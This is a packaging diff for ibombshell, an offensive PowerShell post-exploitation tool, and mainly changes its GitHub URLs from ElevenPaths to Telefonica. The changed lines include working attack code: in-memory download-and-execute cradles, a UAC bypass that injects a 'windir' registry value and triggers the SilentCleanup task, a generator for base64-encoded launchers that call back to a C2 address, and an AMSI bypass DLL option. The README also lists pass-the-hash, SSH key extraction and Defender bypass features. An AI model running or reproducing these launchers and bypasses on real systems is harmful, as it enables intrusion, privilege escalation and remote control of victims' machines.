Codebase list ibombshell / 87c71f1
New upstream version 0~git20201107 Sophie Brun 3 years ago
8 changed file(s) with 32 addition(s) and 32 deletion(s). Raw diff Collapse all Expand all
22 RUN apt-get update && \
33 apt-get -y install python3 git python3-pip
44
5 RUN git clone https://github.com/ElevenPaths/ibombshell
5 RUN git clone https://github.com/Telefonica/ibombshell
66
77 RUN chmod -R 755 /ibombshell
88 WORKDIR /ibombshell
99
1010 RUN pip3 install -r ibombshell\ c2/requirements.txt
1111
12 CMD pwsh -C "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console');console;/bin/bash"
12 CMD pwsh -C "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Telefonica/ibombshell/master/console');console;/bin/bash"
1313
33 # **ibombshell - Dynamic Remote Shell**
44
55 ```
6 ,--.!, _ ____ __ _____ __ ____
7 __/ -*- (_) __ )____ ____ ___ / /_ / ___// /_ ___ / / /
8 ,d08b. '|` / / __ / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
9 0088MM / / /_/ / /_/ / / / / / / /_/ /__/ / / / / __/ / /
10 `9MMP' /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/
6 ,--.!, _ ____ __ _____ __ ____
7 __/ -*- (_) __ )____ ____ ___ / /_ / ___// /_ ___ / / /
8 ,d08b. '|` / / __ / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
9 0088MM / / /_/ / /_/ / / / / / / /_/ /__/ / / / / __/ / /
10 `9MMP' /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/
1111
1212 [+] Starting the console...
1313 [*] Console ready!
1414 ```
1515
16 **ibombshell** is a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation). It is a shell that is downloaded directly to memory providing access to a large number of pentesting features. These functionalities can be downloaded directly to memory, in the form of a Powershell function. This form of execution is known as *everywhere*.
16 **ibombshell** is a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation). It is a shell that is downloaded directly to memory providing access to a large number of pentesting features. These functionalities can be downloaded directly to memory, in the form of a Powershell function. This form of execution is known as _everywhere_.
1717
18 In addition, *ibombshell* provides a second execution mode called *Silently*, so the pentester can execute an instance of ibombshell (called *warrior*). The compromised computer will be connected to a C2 panel through HTTP. Therefore, it will be possible to control the warrior and be able to load functions in memory that help the pentester. This is happening whithin the post-exploitation phase.
18 In addition, _ibombshell_ provides a second execution mode called _Silently_, so the pentester can execute an instance of ibombshell (called _warrior_). The compromised computer will be connected to a C2 panel through HTTP. Therefore, it will be possible to control the warrior and be able to load functions in memory that help the pentester. This is happening whithin the post-exploitation phase.
1919
2020 # Prerequisities
2121
22 To run *ibombshell everywhere* it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the [PowerShell GitHub](https://github.com/PowerShell/PowerShell) - *PowerShell for every system!*.
22 To run _ibombshell everywhere_ it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the [PowerShell GitHub](https://github.com/PowerShell/PowerShell) - _PowerShell for every system!_.
2323
24 To run the *ibombshell silently mode* you need python 3.6 and some python libraries. You can install this with:
24 To run the _ibombshell silently mode_ you need python 3.6 and some python libraries. You can install this with:
2525
2626 ```[python]
2727 cd ibombshell\ c2/
3939 To load ibombshell simply run on PowerShell:
4040
4141 ```[powershell]
42 iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)
42 iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)
4343 ```
4444
4545 Now you can run the downloaded ibombshell console running:
6969 This version allows you to run the ibombshell console and remotely control it from the C2 panel created in python. To run this version, first you must launch the console process in powershell:
7070
7171 ```[powershell]
72 iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)
72 iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)
7373 ```
7474
7575 On ibombshell C2 path, prepare the C2:
129129
130130 Some example videos...
131131
132 ### *iBombShell: PoC Warrior + Bypass UAC + Pass the hash*
132 ### _iBombShell: PoC Warrior + Bypass UAC + Pass the hash_
133133
134134 [![iBombShell: PoC Warrior + Bypass UAC + Pass the hash](https://img.youtube.com/vi/v4c8MsOPTyA/0.jpg)](http://www.youtube.com/watch?v=v4c8MsOPTyA)
135135
136 ### *iBombShell: macOS*
136 ### _iBombShell: macOS_
137137
138138 [![iBombShell: PoC de uso desde macOS](https://img.youtube.com/vi/DQlWGPS1CB4/0.jpg)](http://www.youtube.com/watch?v=DQlWGPS1CB4)
139139
140 ### *ibombshell: Extracting Private SSH Keys on Windows 10*
140 ### _ibombshell: Extracting Private SSH Keys on Windows 10_
141141
142142 [![ibombshell: Módulo para extracción de claves privadas SSH en Windows 10](https://img.youtube.com/vi/v7iXEg9cTNY/0.jpg)](http://www.youtube.com/watch?v=v7iXEg9cTNY)
143143
144 ### *iBombShell: PoC savefunctions*
144 ### _iBombShell: PoC savefunctions_
145145
146146 [![iBombShell: PoC savefunctions](https://img.youtube.com/vi/QM0HufCYOEk/0.jpg)](https://www.youtube.com/watch?v=QM0HufCYOEk)
147147
148 ### *ibombshell - Silently bypass UAC Environment Injection*
148 ### _ibombshell - Silently bypass UAC Environment Injection_
149149
150150 [![ibombshell - Modo silencioso para el bypass UAC Environment Injection](https://img.youtube.com/vi/XrWM2gcXo3w/0.jpg)](https://www.youtube.com/watch?v=XrWM2gcXo3w)
151151
152 ### *iBombShell - Mocking Trusted Directory*
152 ### _iBombShell - Mocking Trusted Directory_
153153
154154 [![iBombShell - Mocking Trusted Directory](https://img.youtube.com/vi/6iCFS4FkedM/0.jpg)](https://www.youtube.com/watch?v=6iCFS4FkedM)
155155
156 ### *iBombShell - DLL generation*
156 ### _iBombShell - DLL generation_
157
157158 [![iBombShell - DLL Generation](https://img.youtube.com/vi/I03klvk-DXo/0.jpg)](https://www.youtube.com/watch?v=I03klvk-DXo)
158159
160 ### _iBombShell - AMSI & Windows Defender Bypass_
159161
160 ### *iBombShell - AMSI & Windows Defender Bypass*
161162 [![iBombShell - AMSI & Windows Defender Bypass](https://img.youtube.com/vi/wCBLG3CfWMY/0.jpg)](https://www.youtube.com/watch?v=wCBLG3CfWMY)
162
163163
164164 # License
165165
173173
174174 If you have any problems, you can contact:
175175
176 <[email protected]> - *Ideas Locas CDO - Telefónica*
176 <[email protected]> - _Ideas Locas CDO - Telefónica_
177177
178 <[email protected]> - *Laboratorio Innovación - ElevenPaths*
178 <[email protected]> - _Laboratorio Innovación - ElevenPaths_
179179
180 <[email protected]> - *Ideas Locas CDO - Telefónica*
180 <[email protected]> - _Ideas Locas CDO - Telefónica_
181181
182182 For more information please visit [https://www.elevenpaths.com](https://www.elevenpaths.com).
111111
112112
113113 #Important: URL download ibombshell
114 $gtRawBase = "https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/"
114 $gtRawBase = "https://raw.githubusercontent.com/Telefonica/ibombshell/master/"
115115 $gtRawFunctions = "data/functions/"
116 $functionsList = "https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/functions.txt"
116 $functionsList = "https://raw.githubusercontent.com/Telefonica/ibombshell/master/functions.txt"
117117 [System.Collections.ArrayList]$global:functionsLoaded = "showcommands" , "showfunctions" , "quit"
118118 [System.Collections.ArrayList]$global:internalFunctions = "detect-OS", "printprompt" , "printMessage", "printData", "isadmin", "commandsearch", "addcommand"
119119 #Condition for exit
00 function amsi-dlldisk {
11 param(
22 [Parameter(Mandatory=$false)]
3 [string] $dll = 'https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/data/files/amsi-surprise.dll'
3 [string] $dll = 'https://raw.githubusercontent.com/Telefonica/ibombshell/master/data/files/amsi-surprise.dll'
44 )
55
66 $output = $pwd
1717 }
1818
1919 #Create windir injection
20 New-ItemProperty -Name 'windir' -Path 'hkcu:\environment' -Value "cmd /K c:\windows\system32\windowspowershell\v1.0\powershell.exe -C ""iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console');console"" && REM "
20 New-ItemProperty -Name 'windir' -Path 'hkcu:\environment' -Value "cmd /K c:\windows\system32\windowspowershell\v1.0\powershell.exe -C ""iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Telefonica/ibombshell/master/console');console"" && REM "
2121
2222 #Task (high integrity)
2323 schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
9696
9797 def run(self, code, extension):
9898 output = self.args["output"]
99 code_to_encode = """(iwr -UseBasicParsing -uri 'https://raw.githubusercontent.com/ElevenPaths/ibombshell/Dev/console').Content | iex; console -Silently -uriConsole http://{}:{}""".format(self.args['ip'], self.args['port'])
99 code_to_encode = """(iwr -UseBasicParsing -uri 'https://raw.githubusercontent.com/Telefonica/ibombshell/Dev/console').Content | iex; console -Silently -uriConsole http://{}:{}""".format(self.args['ip'], self.args['port'])
100100 if self.args["base64"] and (self.args["base64"].lower() == "yes"):
101101 code_encode = b64encode(code_to_encode.encode('UTF-16LE'))
102102 code_encode = code_encode.decode()
1111
1212 # -----------name-----default_value--description--required?
1313 options = {"warrior": [None, "Warrior in war", True],
14 "dll": ["https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/data/files/amsi-surprise.dll", "dll url", True]}
14 "dll": ["https://raw.githubusercontent.com/Telefonica/ibombshell/master/data/files/amsi-surprise.dll", "dll url", True]}
1515
1616 # Constructor of the parent class
1717 super(CustomModule, self).__init__(information, options)
3030 }}
3131
3232 #Create windir injection
33 New-ItemProperty -Name 'windir' -Path 'hkcu:\environment' -Value "cmd /K c:\windows\system32\windowspowershell\\v1.0\powershell.exe -W Hidden -C ""iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console');console -silently -uriconsole http://{}:{}"" && REM "
33 New-ItemProperty -Name 'windir' -Path 'hkcu:\environment' -Value "cmd /K c:\windows\system32\windowspowershell\\v1.0\powershell.exe -W Hidden -C ""iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Telefonica/ibombshell/master/console');console -silently -uriconsole http://{}:{}"" && REM "
3434
3535 #Task (high integrity)
3636 schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I